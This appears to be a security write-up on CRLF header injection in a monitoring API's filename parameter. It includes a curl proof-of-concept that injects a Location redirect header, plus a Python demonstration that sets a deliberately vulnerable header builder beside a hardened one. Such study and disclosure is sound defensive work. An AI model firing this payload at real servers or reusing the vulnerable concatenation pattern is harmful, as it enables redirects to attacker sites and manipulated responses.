HTTP header injection vulnerabilities occur when user input is insecurely included in a server's response headers. If an attacker can get carriage-return and line-feed characters (%0D and %0A in their URL-encoded forms) into a header value, the server emits them verbatim, the receiving client treats whatever follows as a new header line, and the attacker can add crafted headers of their own to the response.

To exploit the issue, send the following request:

curl 'http://127.0.0.1:19999/api/v1/data?chart=system.cpu&format=json&points=341&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=360&_=1540750636464&filename="%0aLocation: http://red4sec.com?' -H 'Pragma: no-cache' -H 'Accept-Encoding: gzip, deflate' --compressed -v

The payload is the value of the filename parameter:

"%0aLocation: http://red4sec.com?

The leading double quote presumably closes the quoted string in which the server places the filename, %0a ends that header line, and "Location: http://red4sec.com?" becomes a new header in the response. A client that honours the injected Location header is redirected to an arbitrary, attacker-chosen URL. Note that a single line feed is enough here: RFC 7230 allows a recipient to accept a bare LF as a line terminator, so %0d is not required. The trailing "?" is there so that the remainder of the server's original header (its closing quote) ends up in the query string of the redirect URL, where it is harmless.
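The following is an added example, not code from the original write-up or from the affected product. It reproduces the flaw in a few lines of Python: the filename parameter is taken from the query string and concatenated into a Content-Disposition header (an assumption; the write-up only says the value lands in a response header), the resulting header block is parsed the way a lenient client would parse it, and the injected Location header is recovered. A hardened variant that rejects control characters and escapes the quote is shown beside it.

```python
"""CRLF header injection via a reflected filename parameter: vulnerable vs hardened.

Constructed example. Assumes the server wraps the filename parameter in a
Content-Disposition: attachment; filename="..." header; the original write-up
does not state which header reflects the value.
"""
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit

# The request URL from the write-up, trimmed to the parameters that matter.
PAYLOAD_URL = (
    "http://127.0.0.1:19999/api/v1/data?chart=system.cpu&format=json"
    '&filename="%0aLocation: http://red4sec.com?'
)


def filename_from_url(url: str) -> str:
    """Extract the filename parameter as a server would (parse_qs percent-decodes)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("filename", [""])[0]


def build_headers_vulnerable(filename: str) -> str:
    """The flaw: the decoded value is concatenated straight into the header block."""
    return (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/json\r\n"
        f'Content-Disposition: attachment; filename="{filename}"\r\n'
        "\r\n"
    )


def build_headers_hardened(filename: str) -> str:
    """Reject CR, LF and any other control character; escape the quoted-string delimiters."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in filename):
        raise ValueError("control characters are not allowed in a header value")
    safe = filename.replace("\\", "\\\\").replace('"', '\\"')
    return (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/json\r\n"
        f'Content-Disposition: attachment; filename="{safe}"\r\n'
        "\r\n"
    )


def parse_header_block(raw: str) -> Dict[str, str]:
    """Parse headers like a lenient client: split on LF, tolerate a missing CR."""
    headers: Dict[str, str] = {}
    for line in raw.split("\n")[1:]:  # skip the status line
        line = line.rstrip("\r")
        if not line:
            break  # end of header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def injected_location(url: str) -> Optional[str]:
    """Location header a client would see from the vulnerable server, if any."""
    response = build_headers_vulnerable(filename_from_url(url))
    return parse_header_block(response).get("location")


def hardened_rejects(url: str) -> bool:
    """True when the hardened builder refuses the filename carried by this URL."""
    try:
        build_headers_hardened(filename_from_url(url))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(build_headers_vulnerable(filename_from_url(PAYLOAD_URL)))
    print("injected Location:", injected_location(PAYLOAD_URL))
    print("hardened builder rejects payload:", hardened_rejects(PAYLOAD_URL))
```

Running it shows the server's own closing quote trailing the injected URL (http://red4sec.com?"), which is exactly why the payload ends with a question mark: the leftover character is absorbed into the query string instead of breaking the redirect. The hardened builder refuses the payload outright; in a real fix, validation of header values belongs in the single routine that emits headers, not at each call site.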